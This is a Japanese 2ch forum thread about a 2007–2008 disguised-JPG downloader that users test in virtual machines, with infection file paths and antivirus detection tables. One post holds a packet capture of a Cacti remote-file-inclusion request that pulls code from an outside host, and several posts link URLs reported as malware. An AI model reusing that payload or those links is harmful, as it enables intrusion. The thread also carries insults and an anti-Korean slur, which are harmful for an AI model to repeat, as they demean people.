「msntqsbk.exe」(たぶんランダムなファイル名、Cドライブ直下に発見/39,424Byte)
「apnccwwqvvp.exe」(上に同じく/45,056Byte)
っていうか、仮想ディスクを元に戻して踏み直したら、
ログオン後数分で強制ログアウトするようになったwwこれはひどいwww
でもワンクリックで元通りwwwざまぁwww
で、userinit.exeを殺して、explorerだけ立ち上げてしばらく放っておいたら、
「TrustedAntivirus」とかいう怪しげなプログラムがインストールされた。
現在インストール進行中。ちなみにホストには全く影響なし。
TrustedAntibirusをアンインストールしたらコントロールパネルが消えたw
仕方がないから仮想ディスクを復元して終わり。実環境ではどうすればいいやら…
NODの反応がいまいち良くないな…ファイルを組み込まれる前はちゃんと動作するんだけど、
組み込まれたファイルを検出しないのがあった。
とりあえず、現時点での対策はJavascriptを無効化したり、
IE以外のブラウザを使うしかないんじゃないかな。
そういえば、NetFront(PSP/Windows Mobile 5)も偽装されたファイルに対応できなかった。
自作のjpg風味スクリプトをPSPで踏ませたら普通に動作したw
PSP\UPDATE\EBOOT.PBPにファイルを保存させられればPCより酷い目に遭うかも。(CFWの人は)
飛び先の画像もいくつか踏んだけどなんともねえw
アンチウイルス入れてないけどw
>>606氏は乙だけどsp1じゃ感染して当たり前w
あえて一番脆弱性の多いSP1を選んでみたw
というよりは手元にあるディスクがSP1のだったw
暇があったらSP2とSP3の環境を構築して実験してみる。
janeってstyleあたり?susieプラグイン通した?
ってか、前から気になってたんだけど、これのビューアであやしいURLを
踏んだけど平気だったってひとよくいるけど、これって、susieプラグイン
通してる人と通してない人っているよね…。
どっちも大丈夫っていうなら大丈夫だけど、
たとえば、プラグインつかっている人が大丈夫だけど、通してない人はアウトっていう
やつが出てきたら、かえって意図せずデマが流れて悲惨になる気が…
>>609
SP3の場合、セキュリティもさることながら、安定性や、既存ソフトの動作不具合も気になるww
がんばれ
NOD32/JaneDoe View Alpha/Firefoxは正常動作。
検出・動作はSP1と全く変わらず。安定性はSP2とあんまり変わらないと思う。
…IE大丈夫か?
jane style
プラグインは別になにもw
ほとんどデフォの状態
は?
なるほど。
>>614
俺もプログラムとかさっぱりなんだが、susieってのは、フリーのビューアで昔、定番だったやつ。
んで、このソフト、画像出力にプラグイン方式を使っているから、
プラグインを入れることにより、出力できるファイル形式やら出力方法を自由に変えられるの。
んで、このソフト自体をメインに使っている人は最近はいないと思うんだけど、
このプラグインは他のソフトにも相当利用されていて(有名なのだと、Leeyesとか)、
これにより、画像の表示方法が、自由にカスタマイズできるわけ。
んで、janestyleでも、ビューア設定のところでこれを使えるのさ。
これを使うと、jpg偽装でも、プラグイン独自の読み込みをするから案外ブラクラは回避できたりするわけ
もちろん、自分が何か踏んだが、ゼロデイでまだ対策がわからないというときに、
自分と同じプラグインつかっているひとを見つけないと情報交換できないから困ることもあるが。
(そもそもsusieプラグインでもアウトなら、janeデフォで使っている人はほとんどアウトな気もしないでもないけど)
雨でやられたら行かなくてはいけないからな
↓
ttp://winantivirus.com/
このままではシャットダウンも出来ません・・・
何処かチェックできる所はありませんか?
方法でも良いのでお願いします・・・
とりあえずこのスレを最初から読むべきじゃないのか?
黙れカス
/ ヽ___/ ヽ
/ l___l \
| ● | | ● | / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
へ | へ ヽ ./ | < 逮捕者マダー?
\\ \ \\ ヽ/ / \____________
チン \\ .> \\ ヽ
チン \\/ \\ _ |
\ ̄ ̄ ̄ ̄ ̄ ̄ ̄/ / ̄ ヽ / _
\回回回回回/ ̄ ̄ヽ / ̄ ̄ /|
\___/ ヽ____/ / |
/ |
/ |
>>383みたいな書き方だな。この人はあれから全く顔出してないし。釣りの一種か。
黙れクソカス
存在するなカス
ttp://jp.youtube.com/watch?v=R8Ep0seKlN8&eurl=
サンクス。グーグルと間違えないようするよ。
で、Proxomitronを入れたら回避出来た。
それ以来、Proxomitronを間にかましてしかブラウジングしなくなったよ。
オミトロン様様です。
そろそろ夏冬の自由課題に「ウィルスの収集と観察」を提出するお子ちゃまも現れるのでは・・・
未だに騒いでるお馬鹿ちゃんがいるみたいだけど
黙れカス
存在するなカス
Zipでクレ
黙れカス
IE7なので、再起動してもフォーマットはされませんでした。
今しがたノートンでスキャンしたらDownloaderが検出されました。
これがフォーマットウィルスですか?
駆除前に送信したメールで、受信者に感染しますか?
ご存知の方教えて下さい、お願いします。
相手に損害が出たら訴えられます
いい加減にしろ。何度言ったら分かるんだ。
感染しないと言う事ですね。
ありがとうございます。
犯人特定の定義ファイルを作ればいい
スタートアップになくても感染してる事例があるってこと?
>>562
感染確認
心配な人、↓にbatファイルが無ければおk
スタートアップ
Windows 9x/Me
C:\WINDOWS\All Users\スタート メニュー\プログラム\スタートアップ\BugFix[ランダムな数値].txt(空白).bat
Windows NT/2000
C:\WINNT\Profiles\All Users\スタートメニュー\プログラム\スタートアップ\IE_Up[ランダムな数値].txt(空白).bat
Windows XP
C:\Documents and Settings\All Users\スタート メニュー\プログラム\スタートアップ\WinUpd[ランダムな数値].txt(空白).bat
AUTOEXEC.BAT
Windows 9x
C:\AUTOEXEC.BAT .txt
Windows XP
C:\WINDOWS\SYSTEM32\AUTOEXEC.NT .txt
クイック起動
Windows 9x
C:\WINDOWS\Application Data\Microsoft\Internet Explorer\Quick Launch\AntiVirus[ランダムな数値].txt(空白).bat
Windows 2000/XP
C:\Documents and Settings\All Users\Application Data\Microsoft\Internet Explorer\Quick Launch\SecurityAlert[ランダムな数値].txt(空白).bat
必要な時以外JAVAとか切っとく癖を付けるのが大事ですな
より抜粋
1.偽装JPGが表示され、スクリプトが組まれたページへリダイレクト。
2.動画再生ボタンをクリックするとスクリプトが発動。
3.telnetストームをはじめとする複合的なブラクラで各種アプリケーションソフト(メディアプレイヤー、メールソフト、スカイプなど)を起動させる。
4.ユーザーがパニくってるところでbatファイル?を間違って実行させる。
5.再起動させると、HDDあぼーん。
MySpaceやExcite.comなどの大手サイトに、マルウェアをインストールさせるバナー広告が表示されていたという。
2008年01月08日 13時05分 更新
米MySpaceなどの大手サイトに、マルウェアをインストールさせるバナー広告が混入していたと、セキュリティ企業のTrend Microがブログで報告した。
Trend Microが報道を引用して伝えたところでは、悪質バナー広告はMySpaceのほか、検索ポータルサイトのExcite.comや、ドイツのBlickというサイトでも見つかったという。
MySpaceは人気便乗を狙ったマルウェアの標的になっており、11月にも、ユーザーを悪質サイトにリダイレクトするコードが仕掛けられる事件が起きている
こうしたケースではシステムの脆弱性が悪用されることも多く、ユーザーはOSだけでなく、サードパーティーのソフトも常にセキュリティアップデートをインストールしておく必要があると、Trend Microは忠告している。
どうやら弟が踏んだらしい。
2年前に死んだ犬の写真と、
母親の友人たちとの旅行の写真が消えてしまったと
両親がたいそう落ち込んでた・・・
弟も弟で親と大喧嘩して、家は年始早々
あまりいい雰囲気じゃなかった・
とか書けば満足ですか犯人さんww
> ttp://internet.watch.impress.co.jp/cda/news/2008/01/07/18052.html
> シマンテックとトレンドマイクロに確認したところ、両社ともこの問題について対応を進めており〜
↑
結局はその場限りの――つまり極めてユニークなファイルにしか対応しないという
両社および MS の頭の良さは、過去の例からしてもわかりますね。
つまりこれ、もう少なくとも4年以上も根本的な対応を放置しているということです。
↓
ttp://gunkanmaki.jog.buttobi.net/MiniReport20040313.html
> yahooでの話ですが、amilala-exploitは、複数のモジュールの組み合わせによって
> 実行内容も毎回変るようです。各スクリプトの記述もどんどん更新され
> (PHPやASPで動的ランダム乱数付き出力のものもあったと思う)、
> ウィルスベンダーやフィルタリングが過去のものに対応しても、
> 最新のものには指紋とパターンマッチしないということになります。
ttp://oshiete1.goo.ne.jp/qa770340.html
ttp://www.geocities.co.jp/Playtown-Bishop/7102/taisaku/flatalk4.html#562
04/02/09
> トレンドマイクロが、アミララについて回答した
> winupdateはまめに。VBでは対応しかねます。
過去に修正されたと思われている脆弱性を組み合わせて利用しているのが多いですね。
まあそれ以前に、パッチを当てていない人もいまだにいるということもありますが。
そして修正済だとされる脆弱性が本当に修正されているのかどうか、
つまりある条件のもとでは Unpatched になるのではないかと、
検証してみる気はないんでしょうかね。愉快なものがけっこう残っているものですよ。
0010 01 4e ea e8 40 00 30 06 33 14 41 cb 86 64 cb 57 .N..@.0.3.A..d.W
0020 98 26 d2 5f 00 50 38 a2 44 ed 9b d4 88 b2 80 18 .&._.P8.D.......
0030 16 d0 a3 79 00 00 01 01 08 0a df 5b ae a3 00 00 ...y.......[....
0040 00 00 47 45 54 20 2f 63 61 63 74 69 2f 69 6e 63 ..GET /cacti/inc
0050 6c 75 64 65 2f 63 6f 6e 66 69 67 5f 73 65 74 74 lude/config_sett
0060 69 6e 67 73 2e 70 68 70 3f 63 6f 6e 66 69 67 5b ings.php?config[
0070 69 6e 63 6c 75 64 65 5f 70 61 74 68 5d 3d 68 74 include_path]=ht
0080 74 70 3a 2f 2f 77 77 77 2e 67 65 6f 63 69 74 69 tp://www.geociti
0090 65 73 2e 63 6f 6d 2f 74 72 75 73 74 6f 70 74 2f es.com/trustopt/
00a0 74 2e 74 78 74 3f 20 48 54 54 50 2f 31 2e 31 0d t.txt? HTTP/1.1.
00b0 0a 41 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 41 63 .Accept: */*..Ac
00c0 63 65 70 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 cept-Language: e
00d0 6e 2d 75 73 0d 0a 41 63 63 65 70 74 2d 45 6e 63 n-us..Accept-Enc
00e0 6f 64 69 6e 67 3a 20 67 7a 69 70 2c 20 64 65 66 oding: gzip, def
00f0 6c 61 74 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 late..User-Agent
0100 3a 20 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 : Mozilla/4.0 (c
0110 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 20 ompatible; MSIE
0120 36 2e 30 3b 20 57 69 6e 64 6f 77 73 20 39 38 29 6.0; Windows 98)
0130 0d 0a 48 6f 73 74 3a 20 32 30 33 2e 38 37 2e 31 ..Host: 203.87.1
0140 35 32 2e 33 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 52.38..Connectio
0150 6e 3a 20 43 6c 6f 73 65 0d 0a 0d 0a n: Close
これ何?
複数の回線とPCで、あらかじめ作っておいたシナリオのレスで自演してるだけ。
昔で言うクラッシュミーみたいなのとか、ストレンジワールドみたいなものなら問題だが、
こんなただ転送されるだけでブラクラでもなんでもない代物で祭りになるわけないだろが。
実際に消えたわけだが。
VirtualBox上でだがな。
フォーマットされて仕事ができなくなったという話を聞かないな
やっぱりネタだったの?
公開された対処法も講じずに敢えて踏む馬鹿もそんなにいないだろ。
windows update すれば?今日公開されてるよ。
2chの専用スレを探して書き込みしているどころじゃない気がするが・・・
初心者ならパソコンが壊れたと勘違いするだろうしね。
再起動してもHDDは消えていない
Trojan.HTML.Agent.bというのはどこにあるのだろう
駆除しようにも場所がわかりません
カスペルのオンラインスキャンでも何も出んし・・・
アドレスはころころ変わるかもしれんが、実質何年も前から存在してるしw
ホントにウィルスや脆弱性だったら、セキュリティソフト会社もマイクロソフトも
いくらなんでも4年以上放置せんてw
スレ乱立→ネタ化→年末年始向け祭り (超わかりやすい)
こんなブラクラにすらなってないただのグロ系が、急に注目されるわけがないw
・2ちゃんでのみ話題 (←あとはこれを見たブロガや記者がネタにしているくらい)
・古典的ブラクラ(鑑定スレテンプレに既出)が、なぜか急に出現したことになってる
・何より確かなのは、踏んでも無事だというこの事実(グロではあるかもしれませんが)
(これが本当なら、被害者続出でかなりまえから世界中で話題になっているはずですよね)
>>648のリンク先見てみろ
名前だけで実は全く対策できないソフトウェアを売ってる会社の人じゃね?
バレたら困るんでしょ、いろいろと
ttp://sakura03.bbspink.com/test/read.cgi/ascii2d/1198642072/l50
↑の 269 に例の偽装ファイルと(たぶん)同じものが貼られてあるようですよ。
踏んでも特に変わったことは起きないようです。つまり無害(笑)
★けれど、もちろん各自踏むのは自己責任で(笑)
これは亜種だと思うが。
で、JavaScriptの飛び先が何らかの理由で404になってるみたい。
飛び先の内容によっては有害”だった”かもしれないよ。
どこに飛ぶのかはちょっとソースが暗号化されてるっぽいから今はわからん。
>1.偽装JPGが表示され、スクリプトが組まれたページへリダイレクト。
>2.動画再生ボタンをクリックするとスクリプトが発動。 (以下ry
↑なんにしても、リダイレクトされた時点で、その偽装JPGは無関係。
その後に起こることは、全てリダイレクトされた別ページ上。
転送するのに何も偽装JPGである必然性もない。HTML上で転送されるかもしれない。
スレタイみたいに「踏むとフォーマットされるヤバイ画像」ってのは間違った認識。
せいぜい「(環境によっては)踏むと有害かもしれないページに
リダイレクトされる画像(に見えるが実はHTML+JavaScript)」ってとこ。
↓
祭り騒ぎにしたい=要するにネタ
そこらの説明や認識は、このスレ初期でとっくに済んでるじゃん
対応済みだと主張していた某信者のおかげでさ
ただ初心者に対しては、そう書いた方が気をつけるしわかりやすいでしょ。
別に祭りにすらなってない。注意喚起してただけで、各社対応が終わった段階で
スレが消えるのは当然。だがなぜそれが>>692という結論なのか、論理的に破綻している。
ただネタだという結論からして、それに枝葉を付けているだけじゃないか。
中華で踏んだら即逮捕で相当笑えそう
馬鹿じゃないのか
/ /⌒)ノ ペタン
∧_∧ \ (( ∧_∧
(; ´Д`))' ))(・∀・ ;) もちつけ
/ ⌒ノ ( ⌒ヽ⊂⌒ヽ
.(O ノ ) ̄ ̄ ̄()__ )
)_)_) (;;;;;;;;;;;;;;;;;;;)(_(
/. ――┤. -=・=- -=・=- | | ∧ ∧{´ ◎ `}____( ´∀`)\ う \
./(. = ,= | ∧∧ ∧_∧ | | ( ´ー`) ):::/´∀` ;:::: \ヽ(`Д´)ノ゛\ ま\
|||\┏┓/∫ (=゚ω゚)ノ~ ( ´Д`)// \ < .∧|∧ /::::::::::| .¶_¶. \い\
V/ ∧,,∧ ∬ 〜( x) / / ,一-、(´ー`) /:::::|::::::| (ΦдΦ)/~ \棒\
|| ミ,,゚Д゚ノ,っ━~~ U U / /| / / ̄ l⊂ヽ \/|:::::::::|::::::| γ__ ∧w∧ 旦∬
人 ミ ,,, ~,,,ノ .n THANK YOU 2ch ■■-っ ┌───────┐ \ ( ゚Д゚ )∩゛
( ゚ー゚)と..ミ,,,/~),ヽ(凸)ノ~ and.. ´∀`/. | ● ● | ヽ ノ
/ ̄ ̄し'J\[Y] GOOD-BYE 2ch WORLD! /| .┌▽▽▽▽┐. |____|__||_| ))
/ ● ●、ヽ (. ┤ .| |. |□━□ ) (゚Д゚)?
|Y Y \ またどこかで会おうね.. \. └△△△△┘. | J |)∧_∧
|.| | .▼ |∀゚) |\あ\ | ∀ ノ " , 、 ミ
| \ /■\ _人 |∧∧∩゛∧_∧∩゛∧_∧ | \り.\ | - Å′ ゝ∀ く
| ( ´∀`)___/( ゚Д゚.)'/ ( ´∀` )/ (・∀・ ),. |. \が\. | ). \ Λ_Λ
\ ( O ) 冫、 U / ( / ⊂ ⊂.)ヽ(´ー`)ノ゛ \と.. ∧_∧/(´Д`;)<丶`∀´>
|││ │ ` | | ∪ | | ( ( ( ( へ (゚д゚)〜⌒(゚ー゚*) (-_-) (・ω・` )
(_(__(__)(・∀・) ∪~∪ (_(__) (_(_) く ⊂⌒~⊃。Д。)⊃⊃⊃(∩∩)(∩ ∩)
このスレはここまでです。ご愛顧ありがとうございました
Arcavir 1.0.5 1230.htm Trojan.Downloader.Js.Agent.Aqr
avast! 3.0.1 1230.htm Clean
AVG Anti Virus 7.5.50 1230.htm Small.2.BJ
Avira AntiVir 2.1.11-47 1230.htm TR/Dldr.Agent.aqr.20
BitDefender 7.60825 1230.htm Clean
CA eTrust N/A 1230.htm Clean
CAT QuickHeal 9.00 1230.htm Clean
ClamAV 0.91.2 1230.htm Clean
CPSecure 1.14 1230.htm Troj.Downloader.JS.Agent.aqr
Dr. Web 4.44.0.10150 1230.htm Clean
F-PROT 4.6.8 1230.htm JS/Agent.CW
F-PROT 6 6.2.1 1230.htm JS/Agent.CW
F-Secure 1.10 1230.htm JS/Agent.CW [Libra]
Kaspersky 5.7.13 1230.htm Trojan-Downloader.JS.Agent.aqr
McAfee Virusscan 5.20.0 1230.htm Clean
NOD32 2.70.6 1230.htm Clean
Norman Virus Control 5.70.01 1230.htm JS/Agent.C
Panda 9.04.03.0001 1230.htm Trj/Agent.HQI
Sophos Sweep 4.25.0 1230.htm Clean
Trend Micro N/A 1230.htm JS_DLOADER.ZX
VBA32 3.12.2.5 1230.htm Clean
VirusBuster 2005 1.3.4 1230.htm Clean
http://scanner.virus.org/vscan
http://www.vippers.org/img/uho2255.jpg
\(^o^)/オワタ
開けないんだが
※このアドレスは危険URLのひとつです。
注意!アラートオープンを発見! (2)
注意!ループタグを発見! (7)
注意!逃げウィンドウを発見! (4)
危険!mailtoストームを発見! (100)
危険!無限ループを発見! (4)
危険!ニュースストームを発見! (12)
危険!Telnetストームを発見! (198)
ブラクラチェックが終了しました。
??? ???? ??? ???
?????????????■ ? ??
?? ??■???■?????? ????
????? ??? ?? ?
???? ? ■ ?????? ?? バカにはコピペできないポンデライオン
?? ??????? ????■?????
?????? ??????? ▼
?????????????? ?? ?
?? ???? ?????■? ???
??????????■????▼ ?
?? ???■?? ? ? ?
???? ? ? ????
ジャバとか知らなさ杉ww
しょぼ杉!こんなんでスレたてんなよバカwww
クラシュミーとかストレンジとかもっとスゲー凶悪なのあるぜ
出なおして来いwww
川|川 / 臭 \|〜
川川 ◎---◎|〜
川川 3 ヽ〜
川川 ∴) A(∴)〜
川川 U /〜 ___
_;川川 ダッラ〜 . | | |\_
/ 川川 __/ . | | | | |\
/ / | | | | | | |::::|
( ( ◎ / \_ .| | | | |::::|
\ \ /\  ̄ ̄\ | | | | |::::|
/:\ \ ドピュ ̄\っ))))〜〜| | | | |::::|
/::: \ つ___ | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|
|::: \ (__3。 ;。 ̄ ̄ | _________ .|
|:::: \__/ .| | . |.|
\::: (;;; );; ) | | . |.|
\ \\ .| | |.|
\ ) ) . | | |.|
/ / / | | |.|
/ / / |  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ |
ホントに愉快な人たちですね。wikiとかもウソばかり書いてあるし。
それからあと、Y売の記事書いた某は、救いようのないおバカさんのようですね(笑)
気付いていないのはあんたのほうなんですよ(笑)
いづれも某所のサービスを利用しない者には無關係の筈ですからね(笑)
數日前にフォーラムでも集計結果のレポートがありましたね。
其れを見てわかるのは、數年前の Microsoft Data Access Components の時からさうでしたが、
表面的な事象許りに氣を取られすぎてゐると云ふことです(笑)
うpした奴のほうが〜と反論しても、そんなのカンケーネーと一切無視されると
悪いのは管理人だと
あれじゃないですか。昔のエロ本ビニ本時代の摘発にしても、
見せしめでパクられるのは弱小出版と相場がきまっとりました
今回の件でいえば、たとえば同じ画像がアホーのジオの鯖に放置されていたとしても、
アホーのほうは見て見ぬふり。お上のケツの穴の大きさが測り知れますなぁ
コンピューターウイルス:作成者、配信者、計3人国内で逮捕 京都府警
ttp://mainichi.jp/select/today/news/20080124k0000e040051000c.html
まとめwikiを見たんだけど
未対応のアンチウィルスソフトってまだあるんだね
著作権法で無理やりってのが苦しいね。
作成の証拠だけでどうにかできりゃいいのに。
他社が対応したからって、いまさら急に
マカフィーが泣くのでやめてください
そこにフォーマットされるウィルスを入れるとどんなウィルスなのかわからないので
最強なんじゃない?
「感染を防ぐ「4ヵ条」」より
(略)
> 万が一、感染した場合は「パソコンを初期化して基本ソフトの段階から
> 入れ直したほうが安全だ」と武田教授は話す。
バカがまた一人この世から浄化出来てよかったな
本当に日本は犯罪者に優しい気がするよ。
某国みたいに200年位求刑しとけっつーの。
そんなことがまかり通ることのほうがよーっぽど問題
http://tmp.2chan.net/guro-gazou/src/1201269335707.jpg
http://stat.ameba.jp/user_images/23/f5/10035626786.jpg
http://www5.uploader.jp/user/tane/images/tane_uljp00237.jpg
http://blog.so-net.ne.jp/_images/blog/_031/gocky/5576052.jpg
しかしまあ、よくもこんなにw
ってやっとパターン更新されたのかorz遅すぎるだろ常識的に考えて。
モジュール 対象 名前 ウイルス アクション ユーザ システム情報
IMON ファイル http://www5.uploader.jp/user/tane/images/tane_uljp00237.jpg ウイルスの可能性 : SCRIPT ウイルス
いつもの拡張子偽装のファイルです。危険ですので踏まないで下さい。
さっき他板で踏んだけど、カスペがトロイの木馬ッスよwwって教えてくれた
「電源切っても無意味だと言うことを知れw」
こんな優しさのあるメッセージを残してくれる奴だから
心底、悪い奴でもなさそうだな、中辻ってw
負担掛かりますよね
ウイルス製作者の真意の程は解らないのだからさ。
外部への接続はVMwareの仮想マシンを使うんだよ。
VMwareの仮想マシンは定期的にスナップショットをとっておいて、
何か発見されたら、なにも出てこないポイントまでクリック一つでさかのぼれる。
危険な発言だな・・・
/:::/:::://:::::/::::::::::, -‐''´::>、`ヽ
/:::/::::::/:::::/::::::::::/:::::::::/::::::::::',::::ヽ
/:::/::::::/ヽ::::/:::::::::/:::://:::::::!:::::::|:',:::::ヽ
!::::i::::::/、:::::Y:::::::::/:::::::/::/::::::::::::|::::::::|:::!:',::::',
|:::::!:::::l::'、\!::::::::/::::::/::/:::::::::::::/:::::::/:::!!::',::::',
!::::|::::::|::::ヽ::!::::::/:/::/::/::::::::::::;ィ:/::::/::::ハ::',::::!
|:::|:|::::::!ヽ:::::|::::::|::!::ィ:,イ:::;::::///::::/!:/ !!:!::|
!:::!::!::::::',::, -|::::::!:|/ リ∠ヱ_ノ/::/ ソ-― l!::!::!
|:::|:::!::l::::`i `゙!:::::|:! ヘ:゙ー'ノ `;/ rイ:ク''ゝ!:!/
!:::|:::|::!::::::::'、く!::::ヾ ` ̄ ̄ i` ̄´/:/ グダグダだな
!:::|::::!:|:::::::::::ヽ|:::::|ヽ、 丶 /イ
|:::|::::|:|!::::::::::::::|!:::::! / ,イ:::|
!:::l!:::|:|',:::::::::::::|',:::::ト、 -‐-‐ / |:::::!
!:::!!:::',:!:ヽ:::::::::! ',::::! 丶、 / |:::::|
|:::||:::::',:::::ヽ:_/__ ',:::! `丶 / |::::::!
!::! !:::,∠´---- 、',::ト、 / !:::::|
|::! Y``丶、 ̄ ̄`:',:ト、\ /、、 |:::::!
!:! ,!: : : : : : \ : : :',:! \\ヽヽ、 !::::!
,ヾ'-- 、 : : : : : \: :',:! : : \ヾ ',:\ |::::!
/: : : : : : \ : : : : : ヽ',:| : : : :ヽヽト、: ヽ !::|
/: : : : : : : : : ヽ: : : : : : :',:! : : : : :ヽヽ',ヽ:ヽ !:|
/ : : : : : : : : : : : : ヽ: : : : : :',:!ヽ: : : : : ヾ',ヽヽ:|::!
だから、まず、本体をCDブートし、HDDに格納された仮想マシンを日常は使う。
外部へのアクセスは、それぞれ専用の仮想マシンを使う。
あらかじめ危険と分かっているサイトへのアクセスは、
CDブートした仮想マシンを使うことで何の破壊活動もできなくすることが出来る。
と思う。
おや?
いつの間にかマカも対応してて隔離された
ウイルスの情報をソフト会社に提供すると、ソフト会社が駆除可否を確認した上で、
ウイルス情報を個人から買い取るという新たなサービスを実施する会社が現れた。
この活気的なアイデアを考案した会社はハッドラーソフト株式会社
HadodoraiBugado:http://hadodoraibugado.com/soshi/index.php?
この会社はウイルスの情報により100ドル〜10000ドルで買い取っているという。
今後はウイルス情報を買い取らせるために、どんどん開発しろということですね?
昔から言われてるように、ウィルスはソフト会社が間接的に(ry
http://pc11.2ch.sc/test/read.cgi/sec/1162464139/ に転送
ttp://winnow.oitc.com/MalwarePerformanceGraphic.php?chart=detectionrate&size=20
ttp://virusinfo.info/images/vttesting/december_sum.PNG
一つの具体例:HDDをフォーマットするブラクラ
ttp://www13.atwiki.jp/burakura_hdd/pages/12.html
防げるわけないだろw
汚染されてもすぐ復旧できるっていうだけ
2837(20080130)でprobably a variant of JS/TrojanDownloader.Agentと検出されます
ほんと今更だけど報告だけ
ノートン2008でなんか警告かなんか出たけど、
一瞬、DL画面のプログレスバーが見えたのが気になるwwww
オレ大丈夫なの;;; batは無いし。フツーのautoexecも書き換えられてないし・・
レジストリのrunにもなんもないし。よーし再起動してくるwww
ttp://pc11.2ch.sc/test/read.cgi/sec/1198165180/543-550
怒ってる人がいたけど、今さら対応されても、ってところかなw
やらないよりはマシだろうけど。
問題はダウンローダーの対応が糞遅かった
タダのbatファイルだし
年末の段階で対応できてなかったソフトじゃないか?
今はもう殆どのベンダーが対応してるよ。
まとめとかで問題にしてるのはダウンローダーのだけでしょ
フォーマットまでされたってのはよっぽどのソフトだろう
アンチウイルスで駆除できる在り来たりなウイルスを踏ませて
セキュリティソフトを導入させようとするPC安全協会wの仕業だろ
PC安全協会会員の中にもソフトの導入や買わせるなどの活動とは別に
無差別に他人のPCを壊滅させることに喜びを感じる
キチガイが存在するから警戒がいるな
っていつの30日よw
これヤフージャパンのプロフで使われてたの2004年の話よ?
その後の数年間ずっと未対応だったとしたら、相当の糞ベンダーどもだよ
一応報道じゃあ2007年の12月30日となってるみたいだが。。。。
>2004年の話
それってフォーマットするDATの話?
それともDownloaderのこと?
記事ではDownloaderの事言ってるみたいだけど、
スレと読み合わせると良くわからんのよね。
http://gunkanmaki.jog.buttobi.net/MiniReport20040313.html
▼ 2. 2005年1月時点での AmiLaLa 情報記事(文字化け時:エンコードは Shift-JIS)
http://web.archive.org/web/www1.bbweb-arena.com/lefty/blog258_017905.htm
AmiLaLa が各板の鑑定スレに依頼が出され始めたのが、2004年の1月くらいです。
当時ヤフープロフィールにはスクリプトを仕込むことができたので、
今回とほぼ同内容(引数やファイル名などが異なる)のバッチファイルのダウンロード、
またはADODB や MDAC などを利用したローカルファイルの削除・上書き・作成、
また同時に Cookie 値を渡しながらのブラクラへの転送などが行われていました。
Downloader を仮に AmiLaLa 本体(機能はバッチファイルのダウンロードに限らない)
を呼んだり誘導したりするものとすれば、上記リンクを見ればわかるように、
2004年当時から多種の URL で存在し、それらはみなすぐに消えてます。
昨年12月には30日以前にも多種の URL で鑑定依頼が出され、
上記のように前月11月にも出されてます(これらのファイル群はおそらくすべて消滅)。
従って同様にすぐに消えた「1230.jpg」だけが特別視された理由がわかりません。
(ちなみに AmiLaLa を呼ぶものは画像に限らず、リンク記事にもあるように
html、mhml、xml、exe、swf 形式などもあります。)
> 962 :名無しさん@お腹いっぱい。:2007/12/10(月) 18:18:12
(〜略〜)
> 5.その後、バッチファイルをダウンロードを促される
> ttp://up2.viploader.net/pic2/src/viploaderf120001.jpg
> いきなりスタートアップフォルダ指定ですか
>
> ちなみにバッチファイルは実行するとHDDが全部まっさらになる
------------------------------
http://pc11.2ch.sc/test/read.cgi/pcqa/1192793132/489
> 489 :|A`)ヅウ ◆.vDUUxqvlE :2007/11/21(水) 09:31:54 ID:aIn73kcY
(〜略〜)
> 2 アミララ関係のURLが開き、その後、別ページに飛ばされ延々読み込みが続きます
> 表示窓をクリックすると小窓が多数開き叫び声が再生され
> メーラーが起動させられたので強制的に閉じました
> そこまでウイルス反応なしですが
> PC有害
超thx
これウィルスらしいだがそうなん?
俺の環境(jane)だとブサイクが表示されただけなんだが。。
ttp://up2.viploader.net/pic/src/viploader582987.jpg
今さっき、「gigigi.net」でググったら、レディース(女の暴走族)の画像が
バンとで出てきました。
5秒後位に画面閉じたんですが、大丈夫ですか?
777
合体
「有用と思われる書き込み」ってとこクリックすると、
NODが「BAT/DeltreeY.AN トロイの木馬」ってのを検出&隔離して
接続切断するんだけど・・・
wikiにウイルスがあるってこと??
..| 全力 |....| レイ |....|. プ ...|....| だ!. |....| 桐生一 |
└∩───∩┘└∩───∩┘└∩───∩┘└∩───∩┘└∩───∩┘
ヽ( `・ω・.)ノ ヽ(`・ω・´)ノ ヽ(`・ω・´)ノ ヽ(`・ω・´)ノ ヽ(・ω・´ )ノ
http://news24.2ch.sc/test/read.cgi/news4plus/1220118459/
「うちは成りすまし朝鮮人じゃない」と言って追っ払った
反日変態新聞なんか読むのは朝鮮人と大差ない
NDSのヤツを連想する